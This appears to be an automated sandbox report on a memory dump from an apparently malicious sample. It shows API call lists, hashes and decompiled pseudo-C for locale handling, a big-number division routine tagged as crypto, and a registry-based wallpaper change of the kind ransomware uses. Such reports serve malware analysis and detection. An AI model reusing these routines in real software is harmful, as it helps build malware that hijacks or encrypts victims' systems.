0x0078a90e
0x0078a97e
0x0078a980
0x0078a982
0x0078a995
0x0078a995
0x0078a99c
0x0078a9a2
0x0078a9a5
0x00000000
0x0078a9a5
0x0078a984
0x0078a987
0x00000000
0x00000000
0x0078a98d
0x0078a992
0x00000000
0x0078a915
0x0078a915
0x0078a919
0x0078a92f
0x0078a920
0x0078a924
0x0078a924
0x0078a938
0x0078a939
0x0078a9c3
0x0078a9c3
0x00000000
0x0078a93f
0x0078a93f
0x0078a94e
0x0078a953
0x0078a958
0x0078a9a8
0x0078a9a8
0x0078a9a8
0x0078a9aa
0x0078a9ae
0x0078a9c5
0x0078a9d1
0x0078a9db
0x0078a9de
0x0078a9df
0x0078a9e1
0x00000000
0x00000000
0x0078a9e3
0x0078a9e9
0x00000000
0x00000000
0x0078a9eb
0x0078a9f1
0x00000000
0x00000000
0x0078a9f7
0x0078a9fd
0x0078a9ff
0x00000000
0x00000000
0x0078aa06
0x0078aa0c
0x0078aa0e
0x00000000
0x00000000
0x0078aa10
0x0078aa13
0x0078aa15
0x0078aa17
0x0078aa17
0x0078aa28
0x0078aa2d
0x0078aa2f
0x0078aa8f
0x0078a9b2
0x0078a9c2
0x0078a9c2
0x0078aa34
0x0078aa3e
0x0078aa4e
0x0078aa54
0x0078aa56
0x00000000
0x00000000
0x0078aa5e
0x0078aa6d
0x0078aa73
0x0078aa75
0x00000000
0x00000000
0x0078aa7f
0x0078aa87
0x00000000
0x0078aa8c
0x0078a9b0
0x00000000
0x0078a9b0
0x0078a95a
0x0078a95c
0x0078a960
0x0078a976
0x0078a967
0x0078a96b
0x0078a96b
0x0078a97b
0x00000000
0x0078a97b
0x0078a939

APIs

Part of subcall function 00781CE2: GetLastError.KERNEL32(00000000,?,00775545,?,?,?,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781CE6
Part of subcall function 00781CE2: _free.LIBCMT ref: 00781D19
Part of subcall function 00781CE2: SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D5A
Part of subcall function 00781CE2: _abort.LIBCMT ref: 00781D60

Part of subcall function 00781CE2: _free.LIBCMT ref: 00781D41
Part of subcall function 00781CE2: SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D4E

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0078A99C
IsValidCodePage.KERNEL32(00000000), ref: 0078A9F7
IsValidLocale.KERNEL32(?,00000001), ref: 0078AA06
GetLocaleInfoW.KERNEL32(?,00001001,0077E2C1,00000040,?,0077E3E1,00000055,00000000,?,?,00000055,00000000), ref: 0078AA4E
GetLocaleInfoW.KERNEL32(?,00001002,0077E341,00000040), ref: 0078AA6D

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: aad4024eaaa87c467fdf411b63dcab75b3d94482e051266088f7e3d3776e5636
Instruction ID: 24600cb2468504c5e960457c48728d0b5de55b8cedeabf2b572df3ec08c17b67
Opcode Fuzzy Hash: aad4024eaaa87c467fdf411b63dcab75b3d94482e051266088f7e3d3776e5636
Instruction Fuzzy Hash: EE517171A84219BBFB20FFA5CC45ABA73B8BF44700F05446AE914E7150E778A901CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0077FA50, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0077FA50(signed int* _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				intOrPtr _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t243;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				intOrPtr _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t2 =  &_a8; // 0x78e567
					_t328 =  *_t2;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t52 =  &_a8; // 0x78e567
									_t369 =  *_t52;
									_t243 = _t269 - _t306;
									__eflags =  *((intOrPtr*)(_t369 + 4 + _t243 * 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + 4 + _t243 * 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t60 =  &_a8; // 0x78e567
									_t200 =  *_t60;
									_t351 =  *(_t200 + _t330 * 4);
									_t201 =  *((intOrPtr*)(_t200 + _t330 * 4 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t76 =  &_a8; // 0x78e567
											_t81 =  &_v36;
											 *_t81 = _v36 |  *( *_t76 + _t330 * 4 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											_t95 =  &_v16; // 0x78e567
											__eflags = _t206 -  *_t95;
											if(_t206 >  *_t95) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00790DC0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00790A40(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00790840(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00790840(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t144 =  &_a8; // 0x78e567
													_t266 = _v20;
													_t219 =  *_t144 + 4;
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t170 =  &_a8; // 0x78e567
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  *_t170 + 4;
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t362 = _t362 + 4;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t190 =  &_v16; // 0x78e567
									_t309 =  *_t190 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t274 =  &(_t262[_t204 + 1]);
										do {
											 *_t274 = 0;
											_t274 =  &(_t274[1]);
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t295 = _t328[1];
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t25 =  &_v16; // 0x78e567
										_t250 =  *_t25 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00790A40( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E0078E796(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E0078E796(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E0078E796(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x0077fa5c
0x0077fa5f
0x0077fa63
0x0077fa6d
0x0077fa6d
0x0077fa70
0x0077fa72
0x0077fa74
0x0077fa81
0x0077fa81
0x0077fa84
0x0077fa84
0x0077fa87
0x0077fa8a
0x0077fa8c
0x0077fbbf
0x0077fbc1
0x0077fc0a
0x0077fc0e
0x0077fc14
0x0077fbc3
0x0077fbc5
0x0077fbc8
0x0077fbca
0x0077fbcd
0x0077fbcf
0x0077fbd1
0x0077fc05
0x0077fc05
0x0077fc05
0x0077fbd3
0x0077fbd8
0x0077fbde
0x0077fbde
0x0077fbe1
0x0077fbe3
0x0077fbe5
0x00000000
0x00000000
0x0077fbe7
0x0077fbe8
0x0077fbeb
0x0077fbee
0x0077fbf0
0x00000000
0x0077fbf2
0x00000000
0x0077fbf2
0x00000000
0x0077fbf0
0x0077fbf4
0x0077fbf4
0x0077fbf9
0x0077fbff
0x0077fc03
0x00000000
0x00000000
0x0077fc03
0x0077fc06
0x0077fc06
0x0077fc08
0x0077fc15
0x0077fc18
0x0077fc18
0x0077fc1b
0x0077fc1e
0x0077fc22
0x0077fc25
0x0077fc28
0x0077fc2b
0x0077fc36
0x0077fc2d
0x0077fc32
0x0077fc32
0x0077fc40
0x0077fc45
0x0077fc48
0x0077fc4a
0x0077fc54
0x0077fc57
0x0077fc5e
0x0077fc61
0x0077fc64
0x0077fc66
0x0077fc72
0x0077fc72
0x0077fc72
0x0077fc72
0x0077fc64
0x0077fc77
0x0077fc7e
0x0077fc7e
0x0077fc81
0x0077fc84
0x0077feb6
0x0077feb6
0x0077fc8a
0x0077fc8a
0x0077fc90
0x0077fc93
0x0077fc96
0x0077fc99
0x0077fc9c
0x0077fc9f
0x0077fca2
0x0077fca2
0x0077fca2
0x0077fca5
0x0077fcac
0x0077fcac
0x0077fca7
0x0077fca7
0x0077fca7
0x0077fcae
0x0077fcb2
0x0077fcb5
0x0077fcb7
0x0077fcba
0x0077fcc1
0x0077fcc4
0x0077fcc7
0x0077fcd2
0x0077fcd5
0x0077fcda
0x0077fcdf
0x0077fce6
0x0077fceb
0x0077fced
0x0077fcef
0x0077fcf3
0x0077fcf6
0x0077fcf9
0x0077fd01
0x0077fd0a
0x0077fd0a
0x0077fd0c
0x0077fd0f
0x0077fd0f
0x0077fcf9
0x0077fd19
0x0077fd1e
0x0077fd23
0x0077fd25
0x0077fd28
0x0077fd2a
0x0077fd2d
0x0077fd30
0x0077fd32
0x0077fd35
0x0077fd38
0x0077fd3a
0x0077fd41
0x0077fd46
0x0077fd49
0x0077fd53
0x0077fd55
0x0077fd57
0x0077fd5a
0x0077fd5a
0x0077fd5c
0x0077fd5f
0x0077fd62
0x0077fd65
0x0077fd68
0x0077fd3c
0x0077fd3c
0x0077fd3f
0x00000000
0x00000000
0x0077fd3f
0x0077fd6b
0x0077fd6d
0x0077fd6f
0x00000000
0x0077fd71
0x0077fd71
0x0077fd74
0x0077fd76
0x0077fd76
0x0077fd84
0x0077fd87
0x0077fd8c
0x0077fd8e
0x00000000
0x00000000
0x0077fd90
0x0077fd97
0x0077fd97
0x0077fd9a
0x0077fd9d
0x0077fda0
0x0077fda3
0x0077fda3
0x0077fda6
0x0077fda9
0x0077fdad
0x0077fdb0
0x0077fdb2
0x0077fdb5
0x00000000
0x00000000
0x0077fdb7
0x0077fdb5
0x0077fd92
0x0077fd92
0x0077fd95
0x00000000
0x00000000
0x00000000
0x00000000
0x0077fd95
0x0077fdbc
0x0077fdbc
0x00000000
0x0077fdbc
0x0077fdb9
0x00000000
0x0077fdb9
0x0077fd74
0x0077fd6f
0x0077fdbf
0x0077fdbf
0x0077fdc1
0x0077fdcb
0x0077fdcb
0x0077fdce
0x0077fdd0
0x0077fdd2
0x0077fdd4
0x0077fdd6
0x0077fdd9
0x0077fddc
0x0077fddc
0x0077fddf
0x0077fde2
0x0077fde5
0x0077fde7
0x0077fdfc
0x0077fdfe
0x0077fe00
0x0077fe02
0x0077fe04
0x0077fe06
0x0077fe08
0x0077fe0a
0x0077fe0d
0x0077fe0d
0x0077fe11
0x0077fe13
0x0077fe19
0x0077fe1c
0x0077fe1c
0x0077fe1c
0x0077fe20
0x0077fe20
0x0077fe25
0x0077fe28
0x0077fe28
0x0077fe2d
0x0077fe2f
0x0077fe31
0x0077fe38
0x0077fe38
0x0077fe3a
0x0077fe3c
0x0077fe3f
0x0077fe41
0x0077fe44
0x0077fe44
0x0077fe47
0x0077fe50
0x0077fe50
0x0077fe52
0x0077fe57
0x0077fe5d
0x0077fe61
0x0077fe64
0x0077fe67
0x0077fe69
0x0077fe69
0x0077fe69
0x0077fe6e
0x0077fe6e
0x0077fe71
0x0077fe74
0x0077fe33
0x0077fe33
0x0077fe36
0x00000000
0x00000000
0x0077fe36
0x0077fe31
0x0077fe7b
0x0077fe7b
0x0077fe7c
0x0077fdc3
0x0077fdc3
0x0077fdc5
0x00000000
0x00000000
0x0077fdc5
0x0077fe8c
0x0077fe91
0x0077fe94
0x0077fe98
0x0077fe99
0x0077fe9c
0x0077fe9f
0x0077fea0
0x0077fea3
0x0077fea6
0x0077fea9
0x0077feac
0x0077feac
0x0077feb4
0x0077feb8
0x0077febb
0x0077febc
0x0077febe
0x0077fec0
0x0077fec5
0x0077fed0
0x0077fed0
0x0077fed6
0x0077fed9
0x0077feda
0x0077feda
0x0077fed0
0x0077fede
0x0077fee0
0x0077fee2
0x0077fee4
0x0077fee4
0x0077fee6
0x0077feea
0x00000000
0x00000000
0x0077feec
0x0077feec
0x0077feef
0x0077fef1
0x00000000
0x00000000
0x00000000
0x0077fef1
0x0077fee4
0x0077fef3
0x0077fefd
0x00000000
0x00000000
0x00000000
0x0077fc08
0x0077fa92
0x0077fa92
0x0077fa95
0x0077fa98
0x0077fa9b
0x0077facc
0x0077face
0x0077fb19
0x0077fb1b
0x0077fb22
0x0077fb29
0x0077fb2c
0x0077fb2f
0x0077fb31
0x0077fb35
0x0077fb35
0x0077fb36
0x0077fb39
0x0077fb40
0x0077fb49
0x0077fb4e
0x0077fb51
0x0077fb56
0x0077fb59
0x0077fb5b
0x0077fb60
0x0077fb63
0x0077fb66
0x0077fb66
0x0077fb66
0x0077fb6a
0x0077fb6d
0x0077fb6d
0x0077fb72
0x0077fb72
0x0077fb7d
0x0077fb88
0x0077fb88
0x0077fb8b
0x0077fb97
0x0077fb9c
0x0077fba7
0x0077fba9
0x0077fbab
0x0077fbb1
0x0077fbb6
0x0077fbb8
0x0077fbbe
0x0077fad0
0x0077fadc
0x0077fadc
0x0077fadf
0x0077faef
0x0077faf5
0x0077fafc
0x0077fafe
0x0077fb06
0x0077fb08
0x0077fb0a
0x0077fb0f
0x0077fb12
0x0077fb18
0x0077fb18
0x0077fa9d
0x0077faa0
0x0077faa4
0x0077faaa
0x0077fab9
0x0077fac3
0x0077facb
0x0077facb
0x0077fa9b
0x0077fa76
0x0077fa79
0x0077fa7f
0x0077fa7f
0x0077fa65
0x0077fa6b
0x0077fa6b

Strings

gx, xrefs: 0077FEB8, 0077FCA2, 0077FB31
gx, xrefs: 0077FA6D, 0077FC18, 0077FE3C, 0077FDD6, 0077FC66, 0077FBF4

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: gx$gx
API String ID: 0-699144984
Opcode ID: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
Instruction ID: 9a052681011bb6391ccadf821792fe6bc3d6c424d1b6729e6018eb16ca62d8ca
Opcode Fuzzy Hash: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
Instruction Fuzzy Hash: 5E023C71E002199FDF24CFA9C9906ADBBF1FF88354F25826AD919E7341D734AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00757F10, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00758005

Part of subcall function 00750AA7: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 00750AB6
Part of subcall function 00750AA7: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00750CCD,?,00000000), ref: 00750ADE
Part of subcall function 00750AA7: RegCloseKey.ADVAPI32(00000000,?,?,?,00750CCD,?,00000000), ref: 00750AE9

Strings

Control Panel\Desktop, xrefs: 00757F4B, 00757F7E, 00757FCE
WallpaperStyle, xrefs: 00757F50, 00757F83, 00757FD3
TileWallpaper, xrefs: 00757FEF

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 85feb78892255a093bcdca8cd1a208e69d76db539faa4a2641a17ed130805138
Instruction ID: c9895eb22fdba6cfa522f95666d33c9128d6415818ed7bbc85f93b560426f5f5
Opcode Fuzzy Hash: 85feb78892255a093bcdca8cd1a208e69d76db539faa4a2641a17ed130805138
Instruction Fuzzy Hash: 3511BB62B8474173DD0C71395E5FFAE18129783B21F500268FE012E2DADCCF496683E2

Uniqueness

Uniqueness Score: -1.00%

Function 00789F58, Relevance: 6.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00789F58(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				signed int _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				short _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t34 = E00781CE2(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E00789EE9(0x799e90, 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E0078985A(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E0078997D();
					} else {
						E007898E3(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E00789EE9(0x799b80, 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E0078997D();
							} else {
								E007898E3(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E00789DB7(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t121 = _a12;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t15 = _t121 + 0x120; // 0x77e3e8
							_t89 = _t15;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E00788349(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0077698A();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x7aa00c; // 0x67a7e35e
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E00781CE2(_t89, _t100, _t116);
								_t122 =  *(E00781CE2(_t90, _t100, _t116) + 0x34c);
								_t129 = E0078A66B(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E0078CF51(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E0078A79F(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
